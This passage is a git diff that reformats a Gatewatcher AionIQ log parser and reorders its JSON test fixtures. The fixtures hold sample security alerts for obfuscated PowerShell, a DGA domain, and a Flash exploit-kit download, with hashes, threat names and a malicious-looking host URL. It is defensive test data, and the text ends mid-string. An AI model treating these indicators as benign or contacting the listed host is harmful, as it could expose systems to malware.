-          gatewatcher.sample_id: '{{json_load.message.sample_id}}'
-          gatewatcher.sub_type: '{{json_load.message.sub_type}}'
+          event.module: "{{json_load.message.event_type}}"
+          gatewatcher.calls: "{{json_load.message.calls}}"
+          gatewatcher.encodings: "{{json_load.message.encodings}}"
+          gatewatcher.sample_id: "{{json_load.message.sample_id}}"
+          gatewatcher.sub_type: "{{json_load.message.sub_type}}"
   fileinfo:
     actions:
       - set:
-          gatewatcher.filemagic: '{{json_load.message.fileinfo.magic}}'
+          gatewatcher.filemagic: "{{json_load.message.fileinfo.magic}}"
   dga:
     actions:
       - set:
-          gatewatcher.type: '{{json_load.message.type}}'
-          gatewatcher.domain_name: '{{json_load.message.domain_name}}'
-          gatewatcher.probability: '{{json_load.message.probability}}'
-          gatewatcher.matched_event: '{{json_load.message.matched_event}}'
+          gatewatcher.type: "{{json_load.message.type}}"
+          gatewatcher.domain_name: "{{json_load.message.domain_name}}"
+          gatewatcher.probability: "{{json_load.message.probability}}"
+          gatewatcher.matched_event: "{{json_load.message.matched_event}}"
   retrohunt:
     actions:
       - set:
-          gatewatcher.tlp: '{{json_load.message.tlp}}'
-          gatewatcher.ttp: '{{json_load.message.ttp}}'
-          gatewatcher.risk: '{{json_load.message.risk}}'
-          gatewatcher.ioc_id: '{{json_load.message.ioc_id}}'
-          gatewatcher.case_id: '{{json_load.message.case_id}}'
-          gatewatcher.families: '{{json_load.message.families}}'
-          gatewatcher.ioc_tags: '{{json_load.message.ioc_tags}}'
-          gatewatcher.ioc_type: '{{json_load.message.ioc_type}}'
-          gatewatcher.campaigns: '{{json_load.message.campaigns}}'
-          gatewatcher.ioc_value: '{{json_load.message.ioc_value}}'
-          gatewatcher.meta_data: '{{json_load.message.meta_data}}'
-          gatewatcher.relations: '{{json_load.message.relations}}'
-          gatewatcher.signature: '{{json_load.message.signature}}'
-          gatewatcher.categories: '{{json_load.message.categories}}'
-          gatewatcher.usage_mode: '{{json_load.message.usage_mode}}'
-          gatewatcher.description: '{{json_load.message.description}}'
-          gatewatcher.probability: '{{json_load.message.probability}}'
-          gatewatcher.threat_actor: '{{json_load.message.threat_actor}}'
-          gatewatcher.matched_event: '{{json_load.message.matched_event}}'
-          gatewatcher.external_links: '{{json_load.message.external_links}}'
-          gatewatcher.vulnerabilities: '{{json_load.message.vulnerabilities}}'
-          gatewatcher.ioc_updated_date: '{{json_load.message.ioc_updated_date}}'
-          gatewatcher.targeted_sectors: '{{json_load.message.targeted_sectors}}'
-          gatewatcher.ioc_creation_date: '{{json_load.message.ioc_creation_date}}'
-          gatewatcher.kill_chain_phases: '{{json_load.message.kill_chain_phases}}'
-          gatewatcher.timestamp_package: '{{json_load.message.timestamp_package}}'
-          gatewatcher.matched_event_type: '{{json_load.message.matched_event_type}}'
-          gatewatcher.targeted_countries: '{{json_load.message.targeted_countries}}'
-          gatewatcher.targeted_platforms: '{{json_load.message.targeted_platforms}}'
-          gatewatcher.targeted_organizations: '{{json_load.message.targeted_organizations}}'
+          gatewatcher.tlp: "{{json_load.message.tlp}}"
+          gatewatcher.ttp: "{{json_load.message.ttp}}"
+          gatewatcher.risk: "{{json_load.message.risk}}"
+          gatewatcher.ioc_id: "{{json_load.message.ioc_id}}"
+          gatewatcher.case_id: "{{json_load.message.case_id}}"
+          gatewatcher.families: "{{json_load.message.families}}"
+          gatewatcher.ioc_tags: "{{json_load.message.ioc_tags}}"
+          gatewatcher.ioc_type: "{{json_load.message.ioc_type}}"
+          gatewatcher.campaigns: "{{json_load.message.campaigns}}"
+          gatewatcher.ioc_value: "{{json_load.message.ioc_value}}"
+          gatewatcher.meta_data: "{{json_load.message.meta_data}}"
+          gatewatcher.relations: "{{json_load.message.relations}}"
+          gatewatcher.signature: "{{json_load.message.signature}}"
+          gatewatcher.categories: "{{json_load.message.categories}}"
+          gatewatcher.usage_mode: "{{json_load.message.usage_mode}}"
+          gatewatcher.description: "{{json_load.message.description}}"
+          gatewatcher.probability: "{{json_load.message.probability}}"
+          gatewatcher.threat_actor: "{{json_load.message.threat_actor}}"
+          gatewatcher.matched_event: "{{json_load.message.matched_event}}"
+          gatewatcher.external_links: "{{json_load.message.external_links}}"
+          gatewatcher.vulnerabilities: "{{json_load.message.vulnerabilities}}"
+          gatewatcher.ioc_updated_date: "{{json_load.message.ioc_updated_date}}"
+          gatewatcher.targeted_sectors: "{{json_load.message.targeted_sectors}}"
+          gatewatcher.ioc_creation_date: "{{json_load.message.ioc_creation_date}}"
+          gatewatcher.kill_chain_phases: "{{json_load.message.kill_chain_phases}}"
+          gatewatcher.timestamp_package: "{{json_load.message.timestamp_package}}"
+          gatewatcher.matched_event_type: "{{json_load.message.matched_event_type}}"
+          gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}"
+          gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}"
+          gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}"
diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json
index 5fdb0ae34..f16f95623 100644
--- a/GateWatcher/aioniq/tests/codebreaker.json
+++ b/GateWatcher/aioniq/tests/codebreaker.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ",
         "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
       }
-    },
-    "message": "{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}"
+    }
   },
   "expected": {
     "message": "{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}",
diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json
index 9f740f113..7516b7e85 100644
--- a/GateWatcher/aioniq/tests/dga.json
+++ b/GateWatcher/aioniq/tests/dga.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ",
         "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
       }
-    },
-    "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}"
+    }
   },
   "expected": {
     "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}",
diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json
index 996eea0b8..ebc7c83d1 100644
--- a/GateWatcher/aioniq/tests/malcore.json
+++ b/GateWatcher/aioniq/tests/malcore.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 (B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ",
         "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
       }
-    },
-    "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 (B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}"
+    }
   },
   "expected": {
     "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\